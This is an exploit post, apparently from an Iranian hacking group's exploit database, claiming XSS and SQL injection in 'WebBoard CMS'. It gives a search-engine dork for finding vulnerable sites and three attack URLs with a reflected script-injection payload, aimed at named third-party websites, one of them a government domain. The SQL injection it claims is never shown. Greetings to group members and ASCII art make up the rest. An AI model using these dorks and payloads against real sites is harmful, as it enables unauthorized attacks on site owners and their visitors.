` `.    ,;\' /
                         `.  ,\'/ .\'
                          `. X /.\'
                .-;--\'\'--.._` ` (
              .\'            /   `
             , IeDb.ir     ` \'   Q \'
             ,         ,   `._    \\
          ,.|         \'     `-.;_\'
          :  . `  ;    `  ` --,.._;
           \' `    ,   )   .\'
              `._ ,  \'   /_
                 ; ,\'\'-,;\' ``-
                  ``-..__``--`

#################################

# Exploit Title : WebBoard CMS Multiple  Vulnerability

# Author : IeDb Security Team

# Discovered By : Bl4ck M4n

# Home : http://www.iedb.ir/acc

# Security Risk : High

# Tested on : Linux / xp / vista /

# Dork : inurl: webboard_view.php?qid=

#################################
Exploit (Xss And Sql Injection) :

http://www.tweecholbotanicgarden.com/webboard_view.php?qid=44%22%3E%3Cscript%3Eprompt%28/Bl4ck%20M4n/%29%3C/script%3E
http://www.saira.go.th/webboard/view.php?No=71%22%3E%3Cscript%3Eprompt%28/Bl4ck%20M4n/%29%3C/script%3E
http://studydroid.com/printerFriendlyViewPack.php?packId=223483%22%3E%3Cscript%3Eprompt%28/Bl4ck%20M4n/%29%3C/script%3E


#################################

Yahoo.joker_s_hack_s@yahoo.com


#################################

# Greats : Amir !  Bl4ck N3T ! joker_s ! ErfanMs ! Security ! ExTr4 ! MrHS3c ! z3r0 ! Mr.Time ! E1.Coders ! enddo

# & All Members In IrIsT.Ir / iedb.ir

#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################